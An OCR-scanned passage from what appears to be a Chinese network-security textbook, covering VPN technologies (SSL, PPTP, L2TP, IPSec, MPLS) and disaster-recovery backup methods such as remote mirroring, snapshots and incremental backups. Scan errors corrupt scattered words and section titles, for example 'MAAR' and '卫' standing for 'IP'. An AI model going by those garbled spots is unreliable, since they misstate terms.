性 和 网 络 变化 管理 等 重要 工作 ， 当 然 企 业 也 可 以 自己 组 建 管理 VPN. 

VPN 作为 一 种 组 网 技术 的 概念 ， 有 三 种 应 用 方式 : 远程 访问 虚拟 专 网 (Access 
VPN) 、 企 业内 部 虚拟 专 网 (Intranet VPN) 、 扩 展 的 企业 内 部 虚拟 专 网 (Extranet VPN) 。 
VPN 可 在 TCP/IP 协议 族 的 不 同 层次 上 进行 实现 ， 在 此 基础 上 提出 了 多 种 VPN 解决 
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方案 ， 每 一 种 解决 方案 都 有 各 自 的 优 缺 点 ， 用 户 根据 需求 采用 。 

VPN 技术 通过 构架 安全 网 络 平台 为 虚拟 的 专用 网 通信 提供 具有 隔离 和 隐藏 的 保密 
性 ， 目 前 ，VPN 主要 采用 四 种 技术 来 保证 安全 ， 这 四 项 技术 分 别 是 隧道 技术 、 加 解密 
技术 、 密 钥 管理 技术 、 使 用 者 与 设备 身份 认证 技术 。 其 中 ， 隧 道 技术 是 VPN 的 基本 
技术 。 
6.4.2.1 基于 虚拟 电路 的 VPN 

服务 提供 商 可 以 提供 虚拟 电路 来 建立 IPVPN 服务 。 用 PVC (Permanent Virtual 
Circuit, 永久 虚 电 路 ) 在 帧 中 继 (Frame Relay) 和 ATM (Asynchronous Transfer Mode, 
异步 传输 模式 ) 网 络 中 建立 点 对 点 连接 ， 并 通过 路 由 器 来 管理 第 三 层 的 信息 。 电 信 运 营 
商 或 者 邮电 局 可 以 采用 这 种 办 法 ， 充 分 利用 其 现 有 的 帧 交换 (如 帧 中 继 (Frame Relay, 
FR) ) 或 信 元 交换 (如 ATM) 基础 设施 提供 IPVPN 服务 。 

在 前 面 叙 述 的 专线 VPN 和 拨号 VPN 本 质 上 都 是 通过 在 公共 IP 网 络 中 建立 隧道 
(tunnel) 来 提供 服务 的 。 与 之 不 同 ， 基 于 虚拟 电路 的 VPN 通过 在 公共 的 帧 或 信 元 交换 
网 络 上 的 路 由 来 传送 IP 服务 ， 是 使 用 PVC 而 不 是 tunnel 来 建立 隐私 性 。 因 此 ， 加 密 
是 不 需要 的 。 


务 提供 商 提供 一 种 便宜 、 快 速 的 建立 VPN 服务 的 办 法 ; 可 充分 利用 FR CIR(Committed 
Information Rate) 和 ATM QoS 来 确保 QoS (Quality of Service， 服 务 质量 ) 能 力 ; 虚拟 
电路 拓扑 的 弹性 ， 连 接 无 须 加 密 。 

它 的 缺点 是 ， 不 能 灵活 选择 路 由 ; 比 IPTunnel 的 相对 费用 高 ， 缺 少 IP 的 多 业务 
能 力 ( 如 Voice Over IP, Video Over IP 等 ) 。 
6.4.2.2 ”应 用 层 VPN 

高 层 安 全 协议 (如 安全 套 接 字 层 ，SSL) 可 以 提供 应 用 层 安全 。 

1. SOCKS 

SOCKS 是 一 个 网 络 连 接 的 代理 协议 ， 它 处 于 OSI 模型 的 会 话 层 。SOCKS 能 将 连接 
请 求 进行 鉴别 和 授权 ， 并 建立 代理 连接 和 传送 数据 。 在 SOCKS 协议 中 ， 客 户 程序 通常 
是 先 连接 到 防火 墙 ， 然 后 由 防火 墙 建立 到 目的 主机 的 单独 会 话 ， 这 样 ， 它 使 SOCKS 后 
面 的 主机 能 通过 Intemet 取得 完全 的 访问 权 ， 而 避免 了 通过 Intemet 对 内 部 主机 进行 未 
授权 访问 。 目 前 ， 有 SOCKSv4 和 SOCKSv5 两 个 版 本 ，SOCKSv5 可 以 处 理 UDP, 而 
SOCKSv4 则 不 能 。 

SOCKS 的 问题 在 于 必须 对 客户 端 应 用 程序 做 修改 ， 加 入 对 SOCKS 协议 的 支持 。 与 
IPSec 相 比 ，SOCKS 在 协议 栈 中 处 于 较 高 屋 ， 因 而 效率 相对 比 IPSec 低 一 些 ， 但 另 一 方 
面 ， 较 高 层 协议 对 于 会 话 控制 可 以 提供 更 大 的 灵活 性 。 
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2. 安全 套 接 字 (SSL) 

安全 套 接 字 (Secure Socket Layer, SSL) 属于 高 层 安全 机 制 ， 广 泛 应 用 于 Web 浏 
览 器 程序 和 Web 服务 器 程序 ， 提 供 对 等 的 身份 认证 和 应 用 数据 的 加 密 。SSL 是 一 个 端 
到 端 协议 ， 因 而 是 在 处 于 通信 通路 端点 的 机 器 上 实现 〈 通 常 是 在 客户 机 和 服务 器 上 ) ， 
而 不 需要 在 通信 通路 的 中 间 节 点 〈 如 路 由 器 或 防火 墙 ) 上 实现 。 

在 SSL 中 ,身份 认证 是 基于 证 书 的 , 服务 器 方向 客户 方 的 认证 是 必需 的 ,而 SSL 版 
本 3 中 客户 方向 服务 器 方 的 认证 只 是 可 选项 ， 但 是 并 没有 得 到 广泛 的 应 用 。SSL 会 话 
中 包含 一 个 握手 阶段 ， 在 这 个 阶段 通信 双方 交换 证 书 ， 生 成 会 话 密 钥 ， 协 商 以 后 通信 使 
用 的 加 密 算法 。 完 成 了 握手 以 后 ， 应 用 程序 就 可 以 安全 地 传输 数据 而 无 须 做 很 大 修改 ， 
除了 在 传输 数据 时 要 调用 SSLAPI 而 不 是 传统 的 套 接 字 API。 

虽然 理论 上 SSL 可 以 用 于 保护 任何 TCP/IP 通信 ,但 事实 上 SSL 的 应 用 几乎 只 限 
于 HTTP. 

3. 安全 HTTP 协议 

安全 HTTP 协议 (S-HTTP) 是 HTTP 协议 的 安全 扩展 ， 它 提供 身份 认证 ， 也 可 以 
提供 数据 加 密 。 虽 然 它 比 SSL 要 灵活 得 多 , 但 实际 应 用 中 用 的 很 少 ,， 因为 SSL 易于 管 
理 ， 而 且 实 践 证 明 它 能 为 大 多 数 安全 Web 应 用 提供 足够 的 安全 保护 。 

4. 安全 电子 邮件 

安全 的 多 用 途 因特网 邮件 扩展 (S-MIME) 可 以 被 看 作 一 个 特殊 的 类 似 于 SSL 的 协 
议 ，S-MIME 属于 应 用 层 安全 体系 ， 但 它 的 应 用 仅 限于 保护 电子 邮件 系统 ， 通 过 加 密 和 
数字 签名 来 保障 邮件 的 安全 ， 这 些 安全 手段 都 是 基于 公 钥 技术 的 ， 通 信 双 方 的 身份 靠 
X.509 格式 的 证 书 来 标识 的 。S-MIME 一 般 在 终端 通信 系统 中 实现 ， 无 须 对 通信 途径 的 
路 由 器 或 防火 墙 做 任何 改动 。 
6.4.2.3 ”基于 隧道 协议 的 VPN 

1. 基于 第 二 层 隧 道 协议 的 VPN 

第 二 层 隧 道 协 议 也 就 是 OSI 模型 中 的 数据 链 路 层 的 安全 协议 。 从 软件 方面 考虑 ， 
当前 在 此 层 提供 安全 通道 技术 的 安全 协议 主要 有 : PPTP 和 L2F 和 L2TP。 它 们 主要 是 
为 了 组 建 远程 访问 VPN 而 提出 的 。 

(1) PPTP 一 Point to Point Tunnel Protocol 

PPTP 是 微软 开发 的 一 个 较 旧 的 协议 。 它 将 PPP 帧 封装 在 IP 数据 报 里 以 在 IP 网 
络 中 传输 。 它 提供 PPTP 客户 机 与 PPTP 服务 器 之 间 的 加 密 通 信 ， 人 允许 公司 使 用 专用 
的 “隧道 ”， 通 过 公共 Internet 来 扩展 公司 的 网 络 。PPTP 对 通过 Intemet 的 数据 流 进行 
了 封装 和 加 密 , 从 而 通过 Intemet 实现 多 功能 通信 。 这 就 是 说 , 通过 PPTP 的 封装 或 “ 隧 
道 ” 服务 ， 使 非 IP 网 络 可 以 获得 进行 Intemet 通信 的 优点 ， 但 是 PPTP 会 话 不 可 通过 
代理 器 进行 。PPTP 是 Microsoft 和 其 他 厂家 支持 的 标准 ， 它 是 PPP 协议 的 扩展 ， 可 以 
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通过 Internet 建立 多 协议 VPN. PPTP 使 用 40 或 128 位 的 RC4 加 密 算法 。 

(2) Layer 2 Forwarding 

L2F 为 CISCO 公司 制定 的 关于 VPDN 的 二 层 转发 协议 ， 它 在 第 二 层 上 建立 一 个 
隧道 。 目前 , 在 儿 大 网 络 厂家 的 ROUTERS 设备 中 均 支 持 此 协议 。L2F 需要 ISP 支持 ， 
并 且 要 求 传输 两 端 设备 都 支持 LIF. Ail, L2F 没有 对 数据 的 加 密 机 制 。 

(3) L2TP-Layer2 Tunneling Protocol 

L2TP 结合 了 点 对 点 通道 协议 (PPTP) 和 第 二 层 转发 协议 (L2F) 的 优点 。L2TP 提 
供 了 一 种 PPP 包 的 机 制 ， 特 别 适合 于 通过 VPN 拨号 进入 一 个 专用 网 络 的 用 户 。 它 支 
持 在 各 种 网 络 连接 上 提供 PPP 包 的 封装 ， 支 持 一 个 用 户 同 时 使 用 多 个 并 发 隧道 。 它 同 
样 适用 于 非 IP 协议 , 支持 动态 寻 址 ， 是 目前 唯一 能 够 提供 全 网 状 Intranet VPN 连接 的 
多 协议 隧道 。 (AE, 虽然 L2TP 能 提供 较 高 的 性 价 比 的 远程 访问 , 但 是 它 没有 提供 健壮 
的 安全 保护 措施 ， 它 有 以 下 的 主要 缺陷 ， 仅 对 隧道 的 终端 实体 进行 身份 验证 ， 而 不 是 对 
隧道 中 通过 的 每 一 个 数据 报 文 进行 认证 ， 无 法 抵抗 插入 攻击 、 地 址 欺骗 攻击 等 等 ， 没 有 
针对 每 个 数据 报 文 的 完整 性 校 验 ， 就 可 能 受到 拒绝 服务 攻击 : 发 送 假冒 的 控制 信息 ， 导 
致 L2TP 通道 或 者 底层 PPP 连接 的 关闭 ; 虽然 PPP 报 文 的 数据 可 以 加 密 , 但 PPP 协 
议 不 支持 密 钥 的 自动 产生 和 自动 刷新 ， 因 而 监听 的 攻击 者 就 可 能 最 终 破 解密 钥 ， 从 而 得 
到 所 传输 的 数据 。 

2. 基于 IPSec 的 VPN 

IPSec 是 IETF (Internet Engineer Task Force) 正在 完善 的 安全 标准 ， 它 把 几 种 安全 
技术 结合 在 一 起 形成 一 个 较为 完整 的 体系 ， 受 到 了 众多 厂商 的 关注 和 支持 。IPSec 通过 
对 数据 加 密 、 认 证 、 完 整 性 检查 来 保证 数据 传输 的 可 靠 性 、 私 有 性 和 保密 性 。 

IPSec 协议 比 高 层 安全 协议 (如 SOCKS v5) 的 性 能 好 ， 比 底层 安全 协议 更 能 适应 
通信 介质 的 多 样 性 。 因 为 是 在 IP 层 提供 安全 保护 ， 所 以 对 传输 层 以 上 的 应 用 来 说 是 完 
全 透明 的 ,操作 系统 中 原 有 的 软件 无 须 修改 就 可 以 自动 拥有 IPSec 提供 的 安全 功能 .IPSec 
比 其 他 同类 协议 具有 更 好 的 兼容 性 ， 对 于 受 保护 的 卫 协议 没有 要 求 ， 能 够 支持 通过 IP 
顶层 的 任何 一 种 通信 。 另 外 ， 密 钥 的 自动 管理 使 IPSec 优 于 PPTP/L2TP。 

IPSec 有 两 种 应 用 模式 : 隧道 模式 和 传输 模式 。 当 需要 保护 任何 类 型 的 、 通 过 IP 传 
输 进行 通信 时 ， 就 采用 隧道 模式 。 传 输 模式 常用 于 端 到 端的 安全 保护 。VPN 保护 的 是 
传输 中 的 通信 ， 因 此 采用 隧道 模式 ， 通 过 在 路 由 器 上 配置 IPSec 来 构建 VPN。 

把 具有 IPSec 功能 的 硬件 放 在 网 络 的 不 同 地 方 一 一 路 由 器 、 防火 墙 、 主 机 和 线 绕 中 
的 块 可 以 实现 不 同 的 安全 配置 。 在 主机 上 配置 具有 IPSec 的 堆栈 可 实现 端 到 端的 安全 ; 
通过 具有 IPSec 能 力 的 路 由 器 可 以 构建 VPN; 而 把 基于 主机 和 基于 路 由 器 的 IPSec 解 
决 方案 结合 在 一 起 ， 便 可 以 获得 漫游 road warrior 之 类 的 解决 方案 ， 从 而 为 移动 办 公 人 


ROR 网 络 安全 技术 与 产品 


员 访问 公司 资源 提供 安全 保护 。 
6.4.2.4 基于 MPLS 的 VPN 

基于 FR 和 提供 多 服务 的 ATM 可 提供 保密 性 和 Qos, mi IP 可 以 带 来 端 到 端的 
连接 性 ， 在 ATM 交换 机 中 采用 MPLS 使 得 网 络 供应 商 能 够 在 ATM 结构 上 提供 IP 
服务 。 基 于 多 协议 标记 交换 (Multi-Protocol Label Switching-MPLS) 的 IPVPN 是 面向 
非 连接 的 卫 网 络 , 可 以 像 帧 中 继 和 提供 IP 服务 级 别 一 样 具 有 保密 性 。 使 用 MPLS 可 
以 更 为 有 效 的 构建 VPN. 

在 基于 MPLS 的 VPN 中 ， 服 务 提供 商 为 每 个 VPN 分 配 了 一 个 标识 符 ， 称 作 路 
由 标识 符 (Route Distinguisher, RD) ， 这 个 标识 符 在 服务 提供 商 的 网 络 中 是 独一无二 的 。 
转发 表 中 包括 一 个 独一无二 的 地 址 ， 即 VPN—IP 地 址 ， 是 由 RD 和 用 户 IP 地 址 连接 
形成 。VPN 一 IP 地 址 在 网 络 中 是 独一无二 的 ， 地址 表 存 储 在 转发 表 中 。 与 普通 VPN 相 
比 ， 基 于 MPLS 的 网 络 能 够 将 数据 流 分 开 ， 无 须 建立 隧道 或 加 密 即 可 提供 保密 性 ， 基 
于 MPLS 的 网 络 以 网 络 到 网 络 的 方式 提供 保密 性 。 基 于 MPLS 的 网 络 为 用 户 提供 服 
务 ， 这 将 支持 服务 提供 商 实现 从 面向 传输 到 面向 服务 的 模式 转变 。 基 于 MPLS 的 
IPVPN 网 络 可 以 很 容易 地 与 基于 IP 的 用 户 网 络 结合 起 来 。 租用 者 可 与 供应 商 提 供 的 服 
务 无 颖 结合 , 不 必 改 变 Intranet 应 用 , 因为 这 些 网 络 具 有 应 用 智能 性 、 保 密 性 和 QoS 内 
置 网 络 。 用 户 能 够 使 用 他 们 专用 的 IP 地 址 而 无 须 NAT。 同 一 种 网 络 结构 可 支持 多 种 
VPN, VPN 的 添加 、 移 动 和 改变 非常 容易 。 另 外 ，MPLS VPN 还 有 如 下 优点 : 

(1)MPLS VPN 安全 性 高 , 采用 MPLS 作为 通道 机 制 实现 透明 报 文 传输 , MPLS 的 
标签 交换 路 径 (LSP) 具有 与 FR 和 ATMVCC 相 类 似 的 安全 性 ; 另外， 用 户 还 可 以 设 
置 防火 墙 和 采用 数据 加 密 的 方法 ， 进 一 步 提高 安全 性 。 

(2) 强大 的 扩展 性 。 包 括 两 点 : 网 络 中 可 以 容纳 的 VPN 数目 很 大 ; 同一 VPN 的 
用 户 很 容易 扩充 。 

(3) 业务 的 融合 ， 提 供 了 数据 、 语 音 和 视频 相 融 合 的 能 力 。 

(4) 灵活 的 控制 策略 。 可 以 制定 特殊 的 控制 策略 ， 满 足 不 同 用户 的 特殊 要 求 ， 实 现 
增值 服务 。 

(5) 强大 的 管理 功能 ， 采 用 集中 管理 方式 ， 业 务 配 置 与 调度 统一 平台 ， 减 轻 了 用 户 
的 负担 。 

(6) 服务 级 别 协议 : 目前 有 差别 服务 、 流 量 整 型 和 服务 级 别 来 保证 一 定 的 流量 性 能 ， 
将 来 可 以 提供 带宽 保证 和 更 高 的 服务 质量 保证 。 

(7) 为 用 户 节省 费用 。 线 路 费 的 价格 比 租用 专用 线 便宜 ;用 户 只 需 配 备 CE 设备 ， 
不 需要 专门 的 VPN 网 关 ; 融合 语音 数据 业务 节约 费用 ; 用 户 不 必 进 行 专门 管理 维护 ， 
也 就 不 需要 额外 的 管理 费用 ; 人 员 费 用 : 不 必要 雇用 大 量 的 专业 技术 人 员 。 
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6.4.3 ”网 络 容 灾 备 份 技术 及 应 用 


6.43.1 ”网络 容 灾 备 份 系统 的 工作 原理 

网 络 容 灾 备份 系统 是 指 在 相隔 较 远 的 异地 , 建立 两 套 或 多 套 功能 相同 的 IT ABE, H. 
相 之 间 可 以 进行 健康 状态 监视 和 功能 切换 ， 当 一 处 系统 因 意外 (如 火灾 、 地 震 等 ) 停 止 工 
作 时 ， 整 个 应 用 系统 可 以 切换 到 另 一 处 ， 使 得 该 系统 功能 可 以 继续 正常 工作 。 网 络 容 灾 
技术 是 系统 的 高 可 用 性 技术 的 一 个 组 成 部 分 ， 网 络 容 灾 系统 更 加 强调 处 理 外 界 环境 对 系 
统 的 影响 ， 特 别 是 灾难 性 事件 对 整个 IT 节点 的 影响 ， 提 供 节点 级 别 的 系统 恢复 功能 。 

从 根本 上 说 ， 灾 难 恢复 计划 应 当 包 括 3 个 重要 部 分 : 数据 保护 、 灾 难 防 备 和 事后 恢 
复 。 数 据 系统 的 安全 体系 主要 有 数据 备份 系统 、 高 可 用 系统 两 个 方面 ， 备 份 系统 提供 应 
用 系统 的 数据 后 援 ， 确 保 在 任意 情况 下 (包括 人 工 操作 失误 ) 数 据 具 有 完整 的 恢复 能 力 ， 
高 可 用 性 系统 提供 故障 检测 和 故障 切换 功能 ， 确 保 系 统 在 规定 时 间 内 恢复 服务 能 力 。 

一 个 完善 的 网 络 容 灾 备 份 应 包括 硬件 级 物理 容错 和 软件 级 数据 备份 ， 并 且 能 够 自动 
地 跨越 整个 系统 网 络 平台 ， 其 主要 包括 以 下 儿 个 方面 : 

O 构造 双 机 容错 系统 : 在 企业 业务 网 络 中 ， 最 关键 的 设备 是 文件 服务 器 ， 为 了 保 
证 网 络 系统 连续 运行 ， 必 须 采 用 文件 服务 器 双 机 热 备 份 容错 技术 ， 以 解决 硬件 的 故障 。 
从 物理 上 保证 企业 应 用 软件 运行 所 需 的 环境 。 

@ 各 类 数据 库 的 备份 : 如 今 企业 应 用 系统 的 数据 库 已 经 相当 复杂 和 庞大 ， 单 纯 使 
用 备份 文件 的 简单 方式 来 备份 数据 库 已 不 再 适用 ， 能 否 将 所 需要 的 数据 从 庞大 的 数据 库 
文件 中 抽取 出 来 进行 备份 ， 是 网 络 备份 的 重要 一 环 。 

@ 网 络 故障 和 灾难 恢复 : 网 络 备份 的 最 终 目 的 是 保障 网 络 系统 安全 运行 ， 当 网 络 
系统 出 现 轴 和 辑 错误 时 ， 网 络 备份 系统 能 够 根据 备份 的 系统 文件 和 各 类 数据 库 文件 在 最 短 
的 时 间 内 迅速 恢复 网 络 系统 。 

@ 备份 任务 管理 : 对 于 网 络 管理 员 来 说 ， 备 份 是 一 项 繁重 的 任务 ， 需 要 完成 大 量 
手工 操作 ， 费 时 费力 。 因 此 ， 网 络 备份 应 具备 实现 定时 和 实时 自动 备份 ， 从 而 减轻 网 
员 的 负担 并 消除 手工 操作 带 来 的 失误 。 

业务 网 络 需 要 备份 的 数据 包括 各 个 平台 系统 数据 和 业务 数据 。 其 中 系统 数据 主要 包 
括 数据 字典 、 权 限 设置 、 存 储 分 配 ， 网 络 地 址 及 系统 配置 参数 。 例 如 网 络 用 户 名 称 、 用 
户 属性 ， 用 户 权限 、 用 户 注 册 文 本 、 应 用 软件 的 可 执行 文件 和 配置 文件 等 。 对 于 容 灾 系 
统 ， 以 上 几 个 部 分 不 可 或 缺 。 例 如 ， 缺 乏 数据 备份 系统 ， 则 系统 在 抗御 误 操作 、 黑 客 攻 
击 等 方面 就 会 十 分 脆弱 ; 没有 远程 的 数据 复制 系统 ， 则 远程 的 数据 一 致 性 得 不 到 保障 。 
在 选择 容 灾 系统 的 结构 时 , 首先 要 考虑 的 就 是 选择 采用 合理 的 异地 数据 复制 技术 , 其 次 ， 
要 建立 多 层次 的 广域网 络 故 障 切 换 机 制 。 
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在 建立 容 灾 备 份 系统 时 会 涉及 到 多 种 技术 ， 如 : 远程 镜像 技术 、 快 照 技 术 、 基 于 IP 
的 SAN 互 连 技术 等 。 

1. 远程 镜像 技术 

远程 镜像 技术 是 在 主 数据 中 心 和 备 援 中 心 之 间 的 数据 备份 时 用 到 。 镜 像 是 在 两 个 或 
多 个 磁盘 或 磁盘 子 系统 上 产生 同一 个 数据 的 镜像 视图 的 信息 存储 过 程 ， 一 个 叫 主 镜像 系 
统 , 另 一 个 叫 从 镜像 系统 。 按 主 从 镜像 存储 系统 所 处 的 位 置 可 分 为 本 地 镜像 和 远程 镜像 。 
远程 镜像 又 叫 远 程 复制 ， 是 容 灾 备份 的 核心 技术 ， 同 时 也 是 保持 远程 数据 同步 和 实现 灾 
难 恢 复 的 基础 。 远 程 镜像 按 请 求 镜像 的 主机 是 否 需 要 远程 镜像 站 点 的 确认 信息 ， 又 可 分 
为 同步 远程 镜像 和 异步 远程 镜像 。 

同步 远程 镜像 〈 同 步 复制 技术 ) 是 指 通过 远程 镜像 软件 ， 将 本 地 数据 以 完全 同步 的 
方式 复制 到 异地 , 每 一 本 地 的 IO 事务 均 需 等 待 远程 复制 的 完成 确认 信息 , 方 予 以 释放 。 
同步 镜像 使 拷贝 总 能 与 本 地 机 要 求 复制 的 内 容 相 匹配 。 当 主 站 点 出 现 故 障 时 ， 用 户 的 应 
用 程序 切换 到 备份 的 替代 站 点 后 ， 被 镜像 的 远程 副本 可 以 保证 业务 继续 执行 而 没有 数据 
的 丢失 。 但 它 存在 往返 传播 造成 延 时 较 长 的 缺点 ， 只 限于 在 相对 较 近 的 距离 上 应 用 。 

异步 远程 镜像 (异步 复制 技术 ) 保证 在 更 新 远程 存储 视图 前 完成 向 本 地 存储 系统 的 
基本 操作 ， 而 由 本 地 存储 系统 提供 给 请 求 镜像 主机 的 IO 操作 完成 确认 信息 。 远 程 的 数 
据 复制 是 以 后 台 同 步 的 方式 进行 的 , 这 使 本 地 系统 性 能 受到 的 影响 很 小 , 传输 距离 长 (可 
达 1000 公里 以 上 ) ， 对 网 络 带宽 要 求 小 。 但 是 ， 许 多 远程 的 从 属 存储 子 系统 的 写 没 有 得 
到 确认 ， 当 某 种 因素 造成 数据 传输 失败 ， 可 能 出 现 数据 一 致 性 问题 。 为 了 解决 这 个 问题 ， 
目前 大 多 采用 延迟 复制 的 技术 《〈 本 地 数据 复制 均 在 后 台 日 志 区 进行 ) ， 即 在 确保 本 地 数 
据 完好 无 损 后 进行 远程 数据 更 新 。 

2. 快照 技术 

远程 镜像 技术 往往 同 快照 技术 结合 起 来 实现 远程 备份 ， 即 通过 镜像 把 数据 备份 到 远 
程 存储 系统 中 , 再 用 快照 技术 把 远程 存储 系统 中 的 信息 备份 到 远程 的 磁带 库 、 光盘 库 中 。 

快照 是 通过 软件 对 要 备份 的 磁盘 子 系统 的 数据 快速 扫描 ， 建 立 一 个 要 备份 数据 的 快 
照 逻辑 单元 号 LUN (Logical Unit Number) 和 快照 cache。 在 快速 扫描 时 ， 把 备份 过 程 中 
即将 要 修改 的 数据 块 同时 快速 拷贝 到 快照 cache 中 。 快照 LUN 是 一 组 指针 ， 它 指向 快照 
cache 和 磁盘 子 系统 中 不 变 的 数据 块 〈 在 备份 过 程 中 ) 。 在 正常 业务 进行 的 同时 ， 利 用 
快照 LUN 实现 对 原 数 据 的 一 个 完全 的 备份 。 它 可 使 用 户 在 正常 业务 不 受 影响 的 情况 下 
〈 主 要 指 容 灾 备 份 系统 ) ， 实 时 提取 当前 在 线 业务 数据 。 其 “备份 窗口 ”接近 于 零 ， 可 大 
大 增加 系统 业务 的 连续 性 ， 为 实现 系统 真正 的 7x24 运转 提供 了 保证 。 

快照 是 通过 内 存 作 为 缓冲 区 (快照 cache) ， 由 快照 软件 提供 系统 磁盘 存储 的 即时 
数据 映像 ， 它 存在 缓冲 区 调度 的 问题 。 
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3. 互 连 技术 

早期 的 主 数据 中 心 和 备 援 数据 中 心 之 间 的 数据 备份 , 主要 是 基于 SAN (Storage Area 
Network) 的 远程 复制 (镜像 )， 即 通过 光纤 通道 FC， 把 两 个 SAN 连接 起 来 ， 进 行 远程 
镜像 《复制 ) 。 当 灾难 发 生 时 ， 由 备 援 数据 中 心 替 代 主 数据 中 心 保证 系统 工作 的 连续 性 。 
这 种 远程 容 灾 备 份 方式 存在 一 些 缺 陷 ， 如 : 实现 成 本 高 、 设 备 的 互 操作 性 差 、 跨 越 的 地 
理 距 离 短 (10 公里 ) 等 ， 这 些 因素 阻碍 了 它 的 进一步 推广 和 应 用 。 

目前 , 出 现 了 多 种 基于 IP 的 SAN 的 远程 数据 容 灾 备份 技术 。 它们 是 利用 基于 下 的 
SAN 的 互 连 协 议 , 将 主 数据 中 心 SAN 中 的 信息 通过 现 有 的 TCP/IP 网 络 ， 远 程 复制 到 备 
EPO SAN 中 。 当 备 援 中 心 存储 的 数据 量 过 大 时 ， 可 利用 快照 技术 将 其 备份 到 磁带 库 
或 光盘 库 中 。 这 种 基于 卫 的 SAN 的 远程 容 灾 备份 ， 可 以 跨越 LAN、MAN 和 WAN, 成 
本 低 、 可 扩展 性 好 , 具有 广阔 的 发 展 前 景 。 基 于 了 王 的 互 连 协议 包括 :FCIP iFCP、Infiniband、 
iSCSI 等 。 
6.4.3.2 ”网 络 容 灾 备 份 系统 分 类 

容 灾 系 统 的 划分 ， 由 其 最 终 要 达到 的 效果 来 决定 。 从 其 对 系统 的 保护 程度 来 分 ， 可 
以 将 容 灾 系 统 分 为 : 数据 容 灾 和 应 用 容 灾 。 

1. 数据 容 灾 

所 谓 数 据 容 灾 ， 就 是 指 建立 一 个 异地 的 数据 系统 ， 该 系统 是 本 地 关键 应 用 数据 的 一 
个 可 用 复制 。 在 本 地 数据 及 整个 应 用 系统 出 现 灾难 时 ， 系 统 至 少 在 异地 保存 有 一 份 可 用 
的 关键 业务 的 数据 。 该 数据 可 以 是 与 本 地 生产 数据 的 完全 实时 复制 ， 也 可 以 比 本 地 数据 
略微 落后 ， 但 一 定 是 可 用 的 。 采 用 的 主要 技术 是 数据 备份 和 数据 复制 技术 。 数 据 容 灾 技 
术 ， 又 称 为 异地 数据 复制 技术 ， 按 照 其 实现 的 技术 方式 来 说 ， 主 要 可 以 分 为 同步 传输 方 
式 和 异步 传输 方式 (各 厂商 在 技术 用 语 上 可 能 有 所 不 同 )， 另 外 ， 也 有 如 “ 半 同 步 ” 这 样 
的 方式 。 半 同步 传输 方式 基本 与 同步 传输 方式 相同 ， 只 是 在 Read 占 IO 比重 比较 大 时 ， 
相对 同步 传输 方式 ， 可 以 略微 提高 IO 的 速度 。 而 根据 容 灾 的 距离 ， 数 据 容 灾 又 可 以 分 
成 远程 数据 容 灾 和 近 程 数据 容 灾 方式 。 

完全 备份 需要 对 所 有 文件 进行 备份 ， 无 论 这 些 文件 自 上 一 次 备份 后 是 否 被 修改 过 ， 
而 增 量 备份 只 备份 在 上 一 次 备份 后 被 修改 过 的 文件 。 

增 量 备份 是 比较 好 的 方式 。 因 为 在 两 次 备份 间 被 修改 过 的 文件 相对 于 整个 备份 文件 
集合 来 说 只 是 少数 。 当 备份 周期 是 一 天 或 者 更 短 时 ， 通 常 只 有 少 于 1% 的 文件 被 修改 。 
此 时 ， 增 量 备份 只 复制 完全 备份 1% 的 数据 ， 占 用 1% 的 存储 资源 。 增 量 备份 分 为 差别 备 
份 和 累积 备份 : 差别 备份 是 从 上 次 备份 后 修改 过 的 文件 的 拷贝 ， 累 积 备 份 是 指 自 上 一 个 
完全 备份 后 被 修改 的 全 部 文件 拷贝 。 

完全 备份 、 累 积 备 份 和 差别 备份 可 以 通过 互相 组 合 以 平衡 备份 对 应 用 的 影响 以 及 整 
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个 文件 系统 和 数据 库 的 恢复 时 间 。 例 如 ， 一 周 的 备份 上 作 可 以 这 样 设计 : 周 日 生成 完全 
备份 ,周一 、 周 二 和 周三 生成 差别 备份 ， 周 四 生成 累积 备份 ， 周 五 和 周 六 生成 差别 备份 。 
当 需 要 恢复 一 周 的 数据 时 ， 首 先 恢复 上 周 日 的 完全 备份 ， 再 恢复 周 四 的 累积 备份 ， 最 后 
恢复 周 五 和 周 六 的 备份 。 在 这 个 过 程 中 ， 恢 复数 据 至 多 需要 四 次 恢复 。 

2. MAAR 

所 谓 应 用 容 灾 ， 是 在 数据 容 灾 的 基础 上 ， 在 异地 建立 一 套 完整 的 与 本 地 生产 系统 相 
当 的 备份 应 用 系统 (可 以 是 互 为 备份 )， 在 灾难 情况 下 ， 远 程 系统 迅速 接管 业务 运行 。 数 
据 容 灾 是 抗御 灾难 的 保障 ， 而 应 用 容 灾 则 是 容 灾 系统 建设 的 目标 。 建 立 这 样 一 个 系统 是 
相对 比较 复杂 的 ， 不 仅 需 要 一 份 可 用 的 数据 复制 ， 还 要 有 包括 网 络 、 主 机 、 应 用 、 甚 至 
IP 等 资源 ， 以 及 各 资源 之 间 的 良好 协调 。 主 要 的 技术 包括 负载 均衡 、 集 群 技 术 。 数 据 容 
灾 是 应 用 容 灾 的 基础 ， 应 用 容 灾 是 数据 容 灾 的 目标 。 在 选择 容 灾 系统 的 构造 时 ， 还 要 建 
立 多 层次 的 广域网 络 故障 切换 机 制 。 本 地 的 高 可 用 系统 指 在 多 个 服务 器 运行 一 个 或 多 种 
应 用 的 情况 下 ， 应 确保 任意 服务 器 出 现任 何故 障 时 ， 其 运行 的 应 用 不 能 中 断 ， 应 用 程序 
和 系统 应 能 迅速 切换 到 其 他 服务 器 上 运行 ， 即 本 地 系统 集群 和 热 备份 。 在 远程 的 容 灾 系 
统 中 ， 要 实现 完整 的 应 用 容 灾 ， 既 要 包含 本 地 系统 的 安全 机 制 、 远 程 的 数据 复制 机 制 ， 
还 应 具有 广域网 范围 的 远程 故障 切换 能 力 和 故障 诊断 能 力 。 也 就 是 说 ， 一 旦 故障 发 生 ， 
系统 要 有 强大 的 故障 诊断 和 切换 策略 制订 机 制 ， 确 保 快 速 的 反应 和 迅速 的 业务 接管 。 实 


故障 切换 和 恢复 机 制 ， 确 保 系统 在 各 个 范围 的 可 靠 和 安全 。 

根据 备份 数据 与 产生 中 心 的 距离 ， 备 份 技术 分 为 同城 备份 和 异地 备份 两 类 。 

同城 备份 ， 是 指 将 生产 中 心 的 数据 备份 在 本 地 的 容 灾 备 份 机 房 中 ， 它 的 特点 是 速度 
相对 较 快 。 由 于 是 在 本 地 ， 因 此 建议 同时 做 接管 。 但 是 它 的 缺点 是 一 旦 发 生 大 灾 大 难 ， 
将 无 法 保证 本 地 容 灾 备 份 机 房 中 的 数据 和 系统 仍 可 用 。 

异地 备份 ， 通 过 互联 网 TCPAP 协议 ， 将 生产 中 心 的 数据 备份 到 异地 。 备 份 时 要 注 
